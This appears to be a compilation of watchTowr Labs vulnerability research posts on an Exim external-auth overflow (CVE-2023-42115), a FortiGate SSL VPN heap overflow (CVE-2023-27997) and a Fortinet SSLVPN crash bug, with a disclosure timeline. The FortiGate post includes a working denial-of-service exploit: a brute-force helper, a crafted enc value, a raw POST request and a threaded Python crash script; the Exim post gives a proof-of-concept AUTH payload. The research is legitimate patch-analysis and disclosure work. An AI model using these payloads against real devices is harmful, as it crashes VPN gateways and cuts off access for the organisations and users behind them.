Fear not, watchTowr is here with some analysis! Let’s take a close look at that big scary CVSS 9.8 in the “External” authentication scheme, and see if it really is as scary as it sounds.

CVE-2023-42115

So, what is ‘external’ authentication all about, anyway?

Well, it enables authentication based on some properties which are ‘external’ to the SMTP session - usually an x509 certificate.

It is configured in the usual way in the Exim configuration file with a line such as driver = external, along with a handful of properties that directs the server to extract and test the correct information from the client. The Exim documentation gives an example similar to the following:

ext_ccert_san_mail:
  driver =            external
  public_name =       EXTERNAL

  server_param2 =     ${certextract {subj_altname,mail,>:} {$tls_in_peercert}}
  server_condition =  ${if forany {$auth2} {eq {$item}{$auth1}}}
  server_set_id =     $auth1

Slightly obtuse, but this is a mostly-readable method of verifying that the cert provided by the client has the correct ‘Subject Alternative Name’ for mail authentication, and then it proceeds to check that the username presented by the client (stored in the $auth1 variable) matches the certificate. This $auth1 is presented by the client in the form of a base64-encoded blob after the AUTH command.

This $auth1 variable is just one parameter that the external matcher takes, however. Other parameters can be provided, delimited by a binary NULL byte. These are put into variables $auth2 through $auth4. These are stored in the auth_vars global var.

uschar *auth_vars[AUTH_VARS];    // AUTH_VARS is 4 at this point

The code which parses these variables will carefully check that it does not write to this global beyond its 4-element limit, as we can see in a clarified version of get-data.c:

#define EXPAND_MAXN 20

int
auth_read_input(const uschar * data)
{
   if ((len = b64decode(data, &clear)) < 0)
     return BAD64;

   for (end = clear + len; clear < end && expand_nmax < EXPAND_MAXN; )
   {
      if (expand_nmax < AUTH_VARS)
         auth_vars[expand_nmax] = clear;
       expand_nstring[++expand_nmax] = clear;
       while (*clear != 0) 
          clear++;
       expand_nlength[expand_nmax] = clear++ - expand_nstring[expand_nmax];
   }
}

What happens if we supply more than four variables? Well, there’s no problem, there’s the crucial if (expand_nmax < AUTH_VARS) before writing to auth_vars. OOB write isn’t possible here.

However, the ‘external’ authenticator in particular misuses this functionality. It calls the code snippet above, which counts the variables, correctly ignoring any that are beyond AUTH_VARS. However, let’s see what the external authenticator does once auth_read_input has returned:

if (*data)
  if ((rc = auth_read_input(data)) != OK)
    return rc;

...

if (ob->server_param2)
{
  uschar * s = expand_string(ob->server_param2);
  auth_vars[expand_nmax] = s;       // 👀!!
  expand_nstring[++expand_nmax] = s;
  expand_nlength[expand_nmax] = Ustrlen(s);
  if (ob->server_param3)
  {
    s = expand_string(ob->server_param3);
    auth_vars[expand_nmax] = s;
    expand_nstring[++expand_nmax] = s;
    expand_nlength[expand_nmax] = Ustrlen(s);
  }
}

What’s that I spy? Is that an unguarded access to auth_vars, indexed by the expand_nmax that holds the number of variables observed, and may be anywhere up to EXPAND_MAXN (20)?!

I think so!

This enables an attacker to write two pointers, pointing to the data at ob->server_param2 and ob->server_param3, beyond the index of the auth_vars buffer.

Here’s an example SMTP session to show the overflow in action. Unfortunately, no segfault is produced, and the corruption is silent. We verified the overflow by adding extra logging to Exim.

EHLO watchtowr
> 250-host Hello root at watchtowr
AUTH external YWFhYQBhYWFhAGFhYWEAYWFhYQBhYWFhAGFhYWEAYWFhYQo=

Here, we’ve connected to the server, said hello (well, EHLO, which is an extended version of the usual HELO), and elected to perform external authentication via the AUTH external command, supplying a base64-encoded blob, as one would expect. The base64-encoded blob in question, however, contains seven fields, delimited by NULL bytes.

$ echo YWFhYQBhYWFhAGFhYWEAYWFhYQBhYWFhAGFhYWEAYWFhYQo= | base64 -d | hexdump.exe -C
00000000  61 61 61 61 00 61 61 61  61 00 61 61 61 61 00 61  |aaaa.aaaa.aaaa.a|
00000010  61 61 61 00 61 61 61 61  00 61 61 61 61 00 61 61  |aaa.aaaa.aaaa.aa|
00000020  61 61 0a                                          |aa.|

The first four variables are correctly parsed by auth_read_input, which duly sets expand_nmax to 7, since there are seven variables present. The ‘external’ authenticator then attempts to append the ob->server_param2 variable - resulting in the promised OOB write to auth_vars[7] .

Consequences

So, scary stuff! CVSS 9.8!

Not quite. Even if you do rely on this functionality, it is difficult to imagine how an attacker could craft a functional exploit given the constraints on the written data. Of course, it’s always possible - never say never! - but it seems unlikely to us.

So, our advice is the usual - patch when you can, once patches are available (Exim have stated they will release patches at 12:00 UTC today, Monday 2nd October). But in the meantime, don’t panic - this one is more of a damp squib than a world-ending catastrophe.

Brief FAQ

I bet you have loads of questions, so let’s have a simple FAQ to answer the burning questions you might have.

I don’t use SPA auth, or internal auth. I don’t have a malicious DNS server and I don’t use the spf condition in my ACLs. Finally, I don’t use that weird Exim Proxy thing. Do I have anything to worry about?

Not at all. Patch at your leisure if you like, but you’ve likely got zero exposure.

I don’t know if I use SPA or internal auth! How can I find out?!

Look in your Exim config (if you don’t know where it is, run exim4 -bP configure_file to find out). If you find the following lines, you are likely using one of the affected authentication mechanisms:

driver = external

Or for SPA:

driver = spa

Why are we only seeing disclosure now, given that the initial report was in June 2022?

🤷

Please exercise caution and apply patches to systems you identify internally as running an affected version of Exim - but, luckily(?) this is not the end-of-the-world moment it was purported to be.

If you'd like to learn more about how the watchTowr Platform, our Attack Surface Management and Continuous Automated Red Teaming solution, please get in touch.

watchTowr Labs - Blog
Xortigate, or CVE-2023-27997 - The Rumoured RCE That WasAliz Hammond
13 June 2023 at 02:10

Xortigate, or CVE-2023-27997 - The Rumoured RCE That Was

watchTowr Labs - Blog

By: Aliz Hammond

13 June 2023 at 02:10

Xortigate, or CVE-2023-27997 - The Rumoured RCE That Was

When Lexfo Security teased a critical pre-authentication RCE bug in FortiGate devices on Saturday 10th, many people speculated on the practical impact of the bug. Would this be a true, sky-is-falling level vulnerability like the recent CVE-2022-42475? Or was it some edge-case hole, requiring some unusual and exotic requisite before any exposure? Others even went further, questioning the legitimacy of the bug itself. Details were scarce and guesswork was rife.

Many administrators of Fortinet devices were, once again, in a quandary. Since Fortinet don't release discrete security patches, but require that users update to the current build of their firmware in order to remediate issues, updates to their devices are never risk-free. No administrator would risk updating the firmware on such an appliance unless a considerable risk was present. Does this bug represent that risk? We just don't (didn't!) know.

Here at watchTowr, we don't like speculation, and this kind of of vague risk statement - neither do our clients, and they expect us to be able to rapidly tell them if they're affected. Thus, we set out to clear the waters.

Patch Diffing

Since fixes for the vulnerable devices were quietly published by Fortinet, we decided to dive in and 'patch diff' the bug, comparing the vulnerable and patched versions at the assembly level to locate details of the fix. This gives us the ability to understand what has changed across the versions, and thus hone into potentially affected functions.

Unfortunately, this is particularly difficult in a device such as a Fortigate appliance, where all application logic is compiled into a large 66-megabyte init binary. Indeed, the 'resolved issues' section for the patched 7.0.12 states over 70 issues alone (including the enticing-sounding 'Kernel panic occurs when receiving ICMP redirect messages'). Time to wade through the changes!

Our toolset here was the venerable IDA Pro coupled with the Diaphora plugin, designed to aid in exactly this task. To give you an idea of scale, Diaphora 'matched' around 100,000 functions between the patched and the vulnerable codebase, with a further 100,000 it could not correlate.

However, one piece of information we have is that the bug affects only SSL VPN functionality, and so we zoomed in on changes related to just that. After disregarding a number of false positives, we come across a very interesting looking diff -

Disregarding the noise, we can see that a number of movzx instructions have been added to the code (the vulnerable version is on the left, the fixed on the right). This is interesting as the movzx instruction - or "MOVe with Zero eXtend" - typically indicates that a variable with a smaller datatype is being converted into a variable of a larger datatype. For example, in C, this would usually be expressed as a cast:

unsigned char narrow = 0x11;
unsigned long wide = (unsigned long)narrow;

We've seen instances, time and time again, of bugs seeping into C-language code as developers mismatch variable datatype lengths. Perhaps this is our smoking gun?

Looking further, this function is called by the function rmt_logincheck_cb_handler, which is the callback handler for the endpoint /remote/logincheck, exposed to the world as part of the VPN code, without authentication. This looks like what we're interested in!

Taking a look at the code surrounding our diff is enlightening. Here's some cleaned-up C pseudocode that expresses the relevant part of the vulnerable version (7.0.11, for those of you following along at home). Note that this function receives the value of the enc URL parameter (along with its length).

__int64  sub_15DC6A0(__int64 logger, __int64 a2,  char *encData)
{
	lenOfData = strlen(encData);
	if (lenOfData <= 11 || (lenOfData & 1) != 0)
	{
		error_printf(logger, 8, "enc data length invalid (%d)\n", lenOfData);
		return 0xFFFFFFFFLL;
	}

	MD5Data(g_rmt_loginConn_salt, encData, 8, expandedSalt);
	char* decodedData = (char*)alignedAlloc(lenOfData / 2);
	if (!decodedData)
		return 0xFFFFFFFFLL;

	for(int n = 0; lenOfData > 2 * n; n++)
	{
		char msb = decodeEncodedByte(encData[n * 2    ]);
		char lsb = decodeEncodedByte(encData[n * 2 + 1]);
		decodedData[n] = lsb + (0x10 * msb);
	} 

	char encodingMethod = decodedData[0];
	if (encodingMethod != 0)
		printf("invalid encoding method %d\n", encodingMethod);

	short v14 = ((short*)decodedData)[1];
	unsigned char payloadLength = (v14 ^ expandedSalt[0]);
	v15 = (char)( expandedSalt[1] ^ LOBYTE(v14) );
	if (payloadLength > lenOfData - 5 )
	{
		error_printf(logger, 8, "invalid enc data length: %d\n", payloadLength);
		return 1LL;
	}
...

While this may seem intimidating, it's actually pretty simple, although there are a few things we need to note.

First, the code checks that the enc data is longer than 11 bytes, and an even length, before it proceeds to expand a salt via the MD5Data function Note that this salt is the result of MD5'ing the g_rmt_loginConn_salt concatenated with the first 8 bytes of the input string.

After this, it allocates a buffer for half of the size of the encoded data, and then iterates over all the encoded data, converting each set of two bytes into one byte (via two calls to decodeEncodedByte - they just convert ASCII hex digits to binary). After this, it extracts an encodingMethod from the first byte of the decoded data, and ensures it is not zero (although it doesn't appear to return if this error condition is met, interestingly).

After this is where things get interesting, as a payload length is extracted from the decoded data.

v14, here, is just a temporary value which holds a 16-bit length obtained from the decoded data. The payload length is obtained by XOR'ing this 16-bit value with the first byte of the expanded salt. This is where the bug manifests - can you spot it?

If we put this code into a real C IDE, such as Visual Studio, we'll get a helpful warning from the compiler:

This warning, though verbose, is just cautioning us that the xor operator is taking in a 16-bit short and an 8-bit char, and that the output will always be a char according to the C spec, rather than a 16-bit short. Since this is somewhat counterintuitive, the compiler emits a warning.

If we look at the disassembled code itself, we can see this is where the movzx instructions we saw before come into play. Let's take a look again:

movzx   eax, word ptr [rdx+4]	; short v14 = ((short*)decodedData)[1]
xor     esi, eax				; short result = v14 XOR expandedSalt[0]
movzx   eax, ah					; char v15 = result

And what does the patched version look like? Something like this:

movzx   ecx, byte ptr [rbp+var_50]	; short salt = (char)expandedSalt[0]
movzx   eax, word ptr [rdx+4]		; short v14 = ((short*)decodedData)[1]
xor     ecx, eax					; result = salt XOR v14
movzx   eax, ah						; eax = (char)result
xor     al, byte ptr [rbp+var_50+1] ; HIBYTE(eax) = HIBYTE(result)

In C, the difference is more subtle. The vulnerable version might look as above:

unsigned char payloadLength = (v14 ^ expandedSalt[0]);

While the fixed:

short payloadLength = ((short) v14 ^ expandedSalt[0]);

We can see, now, that the payload length variable has increased from 8 bits to 16.

The final thing that this code snippet does is to perform a length check, ensuring that the payloadLength as obtained from the decoded data does not exceed the length of the allocated output buffer. However, because the payloadLength has been truncated to 8 bits, this check is ineffective.

Take, for example, a buffer of 0x200 bytes, which encodes within it a payloadLength of 0x1000 bytes. Only the bottom 8 bits of the payloadLength is observed, and the comparison 0x00 <= 0x200 is used, which obviously passes.

Reading the rest of the function reveals that this payloadLength is used to control the amount of data we process:

if (v14 != 0)
{
	__int64 lastIndex = payloadLength - 1;
	int inputIndex = 2;
	char* outputData = &decodedData[5];
	for(int outputIndex = 0; ; outputIndex++)
	{
		outputData[outputIndex] ^= expandedSalt[inputIndex];
		if (lastIndex == outputIndex)
			break;

		inputIndex = (outputIndex + 3) % 0x10
		if (inputIndex == 0)
		{
			MD5_CTX md5Data;
			MD5_Init(&md5Data);
			MD5_Update(&md5Data, expandedSalt, 16LL);
			MD5_Final(expandedSalt, &md5Data);
		}
	}
}

Here we are iterating over our output buffer, XOR'ing in data from the expanded salt. Every 0x10 bytes, we MD5 the salt, and use the result as the salt for the next 0x10 bytes. It seems clear that a payloadLength of over 0xFF will cause an out-of-bounds write.

Exploitation

Now that we understand the bug, it's time to exploit it! We won't be publishing a full RCE exploit - we don't see the need to publish this at this stage - but instead will describe crafting an exploit which will corrupt the heap and cause the Fortigate device to crash and reboot.

Let's recap on that enc parameter. What do we need to satisfy? Referring to our code snippet above, we must satisfy the following:

The value must be over 11 bytes in length, and of an even length
The value must contain a hex-encoded ASCII payload, which must be xor'ed with MD5(salt + payload[0:8])
The decoded payload must have bytes 2 to 4 - our payloadLength - set to something greater than 0x00FF

If these conditions are met, then an out-of-bounds write will occur.

The obvious hurdle here is encoding the payload, which requires that we know the g_rmt_loginConn_salt value. Fortunately, if we query the /remote/info endpoint, the server will simply tell us this value, since it is not cryptographically sensitive:

<?xml version='1.0' encoding='utf-8'?>
<info>
<api encmethod='0' salt='401cbdce' remoteauthtimeout='30' sso_port='8020' f='4df' />
</info>

Since MD5 is fairly fast, it's possible to simply bruteforce which values of payload[0:8] will decode to something containing a payloadLength of a given value. Let's look for one with the value 0xc0de, and write a little C code:

int main()
{
	char encData[8];
	memset(encData, '0', sizeof(encData));

	for(unsigned long valToInc = 0; valToInc != 0xffff; valToInc++)
	{
		char valAsHex[10];
		sprintf_s(valAsHex, 10, "%04lx", valToInc);
		memcpy(&encData[4], valAsHex, 4);

		unsigned char hash[0x10];
		MD5Data(g_rmt_loginConn_salt, encData, 8, (unsigned char*)&hash);
		unsigned char decodedSizeLow = hash[2] ^ encData[2];
		unsigned char decodedSizeHigh = hash[3] ^ encData[3];
		unsigned short decodedSize = ((unsigned short)decodedSizeLow) | (((unsigned short)decodedSizeHigh) << 8);
		if (decodedSize == 0xbeef)
		{
			printf("Found value with decodedSize 0x%04lx: 0x%016llx\n", decodedSize, (unsigned long long)encData);
			break;
		}
	}

	return 0;
}

we're soon rewarded:

Found value with decodedSize 0xbeef: 0x000000247255fc38

The 'size' field here is 0x0024, which when XOR'ed with the result of MD5("401cbdce" + "000000247255fc38"), yields a hash of 5c f9 df 8e 0b 03 40 e7 05 84 f0 cc 11 a7 8c a5 - which when XOR'ed with our original input gives a result starting 6c c9 ef be - you can see our new size, 0xbeef, in little-endian format.

Finally, we'll make our input greater than 0xbe bytes so that the truncated length check will pass. Our final enc value:

000000247255fc38aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

We apply this by POST'ing it to /remote/logincheck, along with some other (bogus) parameters:

POST /remote/logincheck HTTP/1.1
Host: <IP>:<port>
Content-Length: <correct value>
Connection: close

ajax=1&username=test&realm=&credential=&enc=000000247255fc38aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ...

And we can see the result in the system logs:

Note that the stack trace here is a red herring - since there is heap corruption, the system is crashing at a point unrelated to the actual attack point. It is also worth pointing out that, since the heap is non-deterministic, running the attack multiple times with differing sizes may be necessary before heap corruption manifests a crash.

I used the following (very messy!) Python code which took a few seconds to a few minutes to cause a crash:

import threading
import requests as requests
import time

def threadMain(idx):
	for n in range(1000 + idx, 32670000, 10):
			try:
				payload = "ajax=1&username=asdf&realm=&enc=000000247255fc38" + ('a' * (n * 2) )
				resp = requests.post(
					f"https://<IP>:<port>/remote/logincheck",
					data=payload,
					verify=False
                    )
			except Exception as e:
				pass

threads = []
for n in range(0, 10):
	t = threading.Thread(target=threadMain, args=(n,))
	t.start()
	threads.append(t)

while(True):
	for t in threads: 
		t.join()


#a()

Impact

While researching the bug itself is a fun way to spend a rainy Sunday afternoon, it's important to remember our original motivation for this, which is to ensure that concerned administrators are able to make a reasoned risk-based decision in regards to remediation. A crucial variable in this decision is the likelihood of exploitation.

It's important to note that this class of bug, the heap overflow, is usually not easy to exploit (with some exceptions). Compared to other classes, such as a command injection, for example, exploitation for full RCE is likely to be out of reach for many attackers unless an exploit is authored by a skilled researcher and subsequently becomes public.

Exploitation is further complicated by the use of the MD5 hash on the output data, but is by no means impossible. Indeed, this bug may attract the kind of exploit developers keen to showcase their skills.

Based on this, it seems unlikely (but at the same time, also plausible) that we'll see widespread exploitation for RCE. However, this is not the only threat from this bug - it is important to note that it is very easy even for an unskilled attacker to craft an exploit which will crash the target device and force it to reboot. In contrast to full RCE, it seems likely that this will be exploited by unskilled attackers for their amusement.

Rapid Response

We hope this blog post is useful to those who are in the unfortunate position of making a patching decision, and helps to offset Fortinet's usual tight-lipped approach to vulnerability disclosure.

For reference, it took a watchTowr researcher around seven hours to reproduce the issue (including around two hours to run Diaphora!). It seems likely that sophisticated adversaries did the same thing, hoping for a window of exploitation before the vulnerability details became public on the 13th.

This vulnerability was reproduced by watchTowr researchers on the 11th of June 2023, well ahead of the scheduled embargo lifting on the 13th.

Soon after understanding the issue, watchTowr automated detection and proactively ran hunts across client estates, ensuring that administrators were aware of any vulnerable installations and had adequate time to remediate issues before the public release of the bug on the 13th.

At watchTowr, we believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation.

If you'd like to learn more about how the watchTowr Platform, our Attack Surface Management and Continuous Automated Red Teaming solution, can support your organisation, please get in touch.

watchTowr Labs - Blog
Fortinet and The Accidental BugAliz Hammond
9 June 2023 at 06:52

Fortinet and The Accidental Bug

watchTowr Labs - Blog

By: Aliz Hammond

9 June 2023 at 06:52

As part of our Continuous Automated Red Teaming and Attack Surface Management capabilities delivered through the watchTowr Platform, we see a lot of different bugs in a lot of different applications through a lot of different device types. We're in a good position to remark on these bugs and draw conclusions about different software vendors.

Our job is to find vulnerabilities, and we take a lot of pride in doing so - it's complex and intricate work. But, it is deeply concerning when this work is trivial in targets that are supposed to be a bastion of security. One common theme that we've seen a lot is that appliances, designed to be deployed at security boundaries, are often littered with trivial security issues.

Today we'd like to share one such example, a scarily-easy-to-exploit vulnerability in the SSLVPN component of Fortinet's Fortigate devices, which we discovered during our research into a totally unrelated bug, and still hasn't been fixed, at the time of writing, despite an extension to the usual 90-day disclosure period.

Before We Begin

So. Let's talk about bugs in general. Bugs are, let's face it, a fact of life. Every vendor has them, and sometimes, they turn into fully-fledged vulnerabilities. There is a common knee-jerk reaction to avoid software by vendors that've had recent hyped bugs, but this is usually short-sighted folly. All vendors have bugs. All vendors have vulnerabilities.

.. However..

Some bugs are more understandable than others, and indeed, some bugs make us question the security posture of the responsible parties.

I'm sure you remember a previous post in which I go into detail about CVE-2022-42475, a vulnerability in a Fortinet appliance which was a pretty serious oh-no-the-sky-is-falling bug for a lot of enterprises. But let's remember our mantra - fair enough, bugs happen, let's not pile on to Fortinet for it.

The Bug

While researching CVE-2022-42475 as part of our rapid reaction capability for clients, we started to notice some unusual errors in our test equipment's logging. The sslvpn process was seemingly dying of a segfault. Initially, we imagined we were triggering our targetted bug for analysis via different code path.

Unfortunately, this was not the case - it turned out to be a completely new bug, found entirely by accident. This was determined by taking a look at the debug log (via diagnose debug crashlog read) which helpfully yields a stack trace:

15: 2022-12-13 05:35:29 <01230> application sslvpnd
16: 2022-12-13 05:35:29 <01230> *** signal 11 (Segmentation fault) received ***
17: 2022-12-13 05:35:29 <01230> Register dump:
18: 2022-12-13 05:35:29 <01230> RAX: 0000000000000000   RBX: 0000000000000003
19: 2022-12-13 05:35:29 <01230> RCX: 00007fff7f4761d0   RDX: 00007fa8b2961818
20: 2022-12-13 05:35:29 <01230> R08: 00007fa8b2961818   R09: 0000000002e54b8a
21: 2022-12-13 05:35:29 <01230> R10: 00007fa8b403e908   R11: 0000000000000030
22: 2022-12-13 05:35:29 <01230> R12: 00007fa8b296f858   R13: 0000000002dc090f
23: 2022-12-13 05:35:29 <01230> R14: 00007fa8b3764800   R15: 00007fa8b2961818
24: 2022-12-13 05:35:29 <01230> RSI: 00007fa8b2961440   RDI: 00007fa8b296f858
25: 2022-12-13 05:35:29 <01230> RBP: 00007fff7f4762a0   RSP: 00007fff7f4761a0
26: 2022-12-13 05:35:29 <01230> RIP: 00000000015e2f84   EFLAGS: 0000000000010286
27: 2022-12-13 05:35:29 <01230> CS:  0033   FS: 0000   GS: 0000
28: 2022-12-13 05:35:29 <01230> Trap: 000000000000000e   Error: 0000000000000004
29: 2022-12-13 05:35:29 <01230> OldMask: 0000000000000000
30: 2022-12-13 05:35:29 <01230> CR2: 0000000000000040
31: 2022-12-13 05:35:29 <01230> stack: 0x7fff7f4761a0 - 0x7fff7f4793b0 
32: 2022-12-13 05:35:29 <01230> Backtrace:
33: 2022-12-13 05:35:29 <01230> [0x015e2f84] => /bin/sslvpnd  
34: 2022-12-13 05:35:29 <01230> [0x015e3335] => /bin/sslvpnd  
35: 2022-12-13 05:35:29 <01230> [0x01586f08] => /bin/sslvpnd  
36: 2022-12-13 05:35:29 <01230> [0x01592c82] => /bin/sslvpnd  
37: 2022-12-13 05:35:29 <01230> [0x016a4c9d] => /bin/sslvpnd

A segfault such as this would often indicate a bug exploitable for remote code execution, and so our interest was piqued. Let's take a look at the faulting code:

mov     rax, [rbp+var_F8]
mov     rdx, r15
mov     rdi, r12
mov     r9, [rbp+var_F0]
mov     rsi, [rbp+var_D8]
lea     rcx, [rbp+var_D0]
movzx   r8d, byte ptr [rax+40h] <-- crash here
call    sub_15E1F80

As you can see, we're trying to dereference the NULL pointer, and pass it to another function. In a higher-level language, such as C, the code might look like this (I've added guessed variable names to try to make things more informative):

sub_15E1F80(conn, reqInfo, helper, &var_D0, *var_F8->memberAt0x40, unknown);

The NULL dereference is occurring because the var_F8 variable contains zero (you can see from the register dump above, the RAX register is, indeed, zero). But why? What should this member do, and why isn't it doing it?

Well, it's quite difficult to know for sure, given only a stripped binary. But we can make some guesses. Since var_F8 is assigned to the result of the function sub_16B8300, let's take a look at what the other callers of this function do with the result. Here's one:

    v4 = sub_16B8300(a2);
    if ( v4->memberAt0x40 )
      v7 = AF_INET6;
    else
      v7 = AF_INET;
    v9 = socket(v7, 1, 6);

It looks like the result is tested to see if it is an ipv4 socket or an ipv6 socket, and a socket is instantiated appropriately by the code. It seems likely that this function returns some kind of socket, perhaps attached to the IO of the request. Another function is more cryptic, but demonstrates the bit-twiddling that is a signature of socket and file descriptor code:

v5 = sub_16B8300(v3);
v14 = ((*(*(v5 + 80) + 112LL) >> 3) ^ 1) & 1;
*v5->memberAt0x40 = v14;

Going back to our crash itself, it's interesting to note that the crash occurs when we send a HTTP POST request to /remote/portal/bookmarks containing no data payload. This would seem to align with our 'IO of the request' theory - if the POST request has a Content-Length of zero, the socket may be closed before the handler gets a chance to run.

It is somewhat alarming that the crash is so easy to trigger, although we are somewhat relieved to report that authentication as a VPN user is required before this endpoint is accessible. Additionally, the results of a more involved analysis, carried out by watchTowr engineers, indicates that exploitation is limited to this denial-of-service condition and does not permit code execution.

However, one could easily imagine a disgruntled employee running a script to repeatedly crash the SSLVPN process, - or worse yet - an attacker trying to prevent access to an environment, to hinder response to another cyber security incident - both scenarios rendering the VPN unusable for the entire workforce. While it's not as bad as the world-ending remote-code-execution bugs we've seen lately (and indeed, were released as this post was in the final stages being drafted) it's still a worrisome bug.

When I say this bug is 'worrisome', I mean this on more than one level. On the surface, of course, it allows adversaries to crash a system service. But it is also worrisome in its pure simplicity.

A Trend

It would be nice if we could say that discovering this bug was a one-in-a-million chance, or that it required the skill of a thousand 'Thought Leaders' - but this just isn't the case based on our experience thus far.

The fact that we discovered this bug while hunting for details of a separate bug does not inspire confidence in the target, and the simplicity of the bug trigger is alarming. While we usually shy away from remarking on a vendor's internal development processes due to the inherent lack of visibility we have, it is very difficult to resist in this case. This does seem very much like the kind of 'textbook' condition that could be discovered very easily by anyone with a basic HTTP fuzzer, which raises serious questions for ourselves about how much assurance Fortinet is really in a position to provide to its userbase. Bugs are an inevitable fact of life, but at least some bugs should not make it to production.

It is, of course, risky for an outside organisation such as ours to make such statements about the internal practices of a software development house. There may be some mitigating reason why this bug wasn't detected earlier, perhaps some complexity hidden within the SDLC which we are hitherto unaware of. However, even if that were the case, we find it difficult to imagine how simple end-to-end HTTP fuzzing would fail to locate a bug like this before a release to production.

One way we can get a further glimpse into Fortinet's practices is by sifting through their release notes. Taking a cursory look reveals some truly alarming bugs - my personal favourite was "WAD crash with signal 11 caused by a stack allocated buffer overflow when parsing Huffman-encoded HTTP header name if the header length is more than 256 characters". It is difficult to imagine a scenario in which that doesn't yield a serious security issue, yet Fortinet don't go into details, and we were unable to locate any security advisory related to this bug, which means that for many people it has gone unnoticed. I imagine the kind of threat actors who are specifically interested in routing platforms comb these release notes, looking for easy quick-wins, exploitable n-day bugs which administrators are not aware of.

Another way to evaluate how seriously Fortinet takes this issue is in their response to it. Fortinet were given the industry-standard 90-day grace period to patch the issue, with an additional extension granted to allow them to fit into their regular release cycle. However, not only did Fortinet neglect to release a fixed version of the 7.2 branch, but the release notes for fixed versions of the 7.0 and 7.4 branches (7.0.11 and 7.4.0) don't appear to mention the bug at all, leaving those users who haven't read this watchTowr blog in the dark as to the urgency of an upgrade.

Conclusion

It is very easy, as a security researcher, to blame software vendors for poor security practices or the presence of 'shallow' bugs. Security is just one component in a modern software development lifecycle, and it is a fact of life that some bugs will inevitably "slip through the 'net" (you see what I did there?) and make it into production software. This is just the nature of software development. Consequently, we try very hard to avoid doing so - software development is difficult.

However, there is a limit to how far back we will push our sense of responsibility to the wider Internet. When vendors have bugs this shallow, this frequently, this is perhaps cause for alarm - and when bugs are buried in release notes, there is serious cause for concern - all in our opinion. The only thing worse than finding out that your firewall is vulnerable to a remote RCE is not finding out.

Being the responsible people we are, we also notified Fortinet of this discovery in accordance with our VDP.

Fortinet were prompt in their confirmation of the bug, and released fixes for two of the three branches of Fortiguard that they maintain - the bug is fixed in versions 7.0.11 and 7.4.0. The Fortiguard team then requested that we extend our usual 90-day release window until 'the end of May' to allow them to release a fix for the 7.5 branch, 7.2.5, a proposal which watchTowr accepted. However, this release has not materialised, and as such there is currently no released fix for the 7.2 branch. Those who operate such devices are advised to restrict SSL VPN use to trusted users if at all possible - hardly an acceptable workaround in our opinion.

Here at watchTowr, we believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation.

If you'd like to learn more about the watchTowr Platform, our Continuous Automated Red Teaming and Attack Surface Management solution, please get in touch.

Timeline

Date	Detail
13th February 2023	Initial disclosure to vendor, vendor acknowledges receipt
2nd March 2023	Follow-up email to vendor
2nd March 2023	Vendor replies that they are working on the issue, and cannot provide a specific date but will keep watchTowr informed as the fix progresses
3rd April 2023	Inform vendor that watchTowr has adopted an industry-standard 90-day disclosure window, request that they release a fix before this window expires
5th April 2023	Vendor replies that a fix has already been developed and released for version 7.0.11 of FortiGuard. Vendor also reveals that a fix has been developed for versions 7.2.5 and 7.4.0, due to be released 'end of May' and 'end of April' respectively. Vendor requests that we delay disclosure until 'end of May' to align with their release schedule; watchTowr agrees
31st May 2023	Disclosure deadline; watchTowr requests that vendor shares CVE and/or 'Bug ID' identifiers to aid clients in tracking the issue
31st May 2023	Vendor requests additional time to develop fix, watchTowr does not agree

DISCLAIMER: This blogpost contains the personal opinions and perspectives of the author. The views expressed in this blogpost are solely those of the author and do not necessarily reflect the opinions or positions of any other individuals, organizations, or entities mentioned or referenced herein.

The information provided in this blogpost is for general informational purposes only. It is not intended to provide professional advice, or conclusions of internal software development processes or security posture. All opinions have been inferred from the experiences of the author.

watchTowr Labs - Blog
Adobe Commerce (Magento) CVE-2022-24086 : Return Of The Text InterpolationAliz Hammond
10 April 2023 at 14:35

Adobe Commerce (Magento) CVE-2022-24086 : Return Of The Text Interpolation

watchTowr Labs - Blog

By: Aliz Hammond

10 April 2023 at 14:35

Adobe Commerce (Magento) CVE-2022-24086 : Return Of The Text Interpolation

In our latest blog post, we'll be discussing a vulnerability that - while not new - is shrouded in mystery. Ranging from bizarre and false PoCs circulating on Twitter, to incomplete analysis on dark corners of the web.

As part of our Attack Surface Management capabilities delivered through the watchTowr Platform, we conduct a thorough analysis of vulnerabilities in technology that are likely to be prevalent across our clients' attack surfaces. This allows us to quickly identify and validate vulnerable systems across large attack surfaces, enabling us to respond rapidly to potential threats.

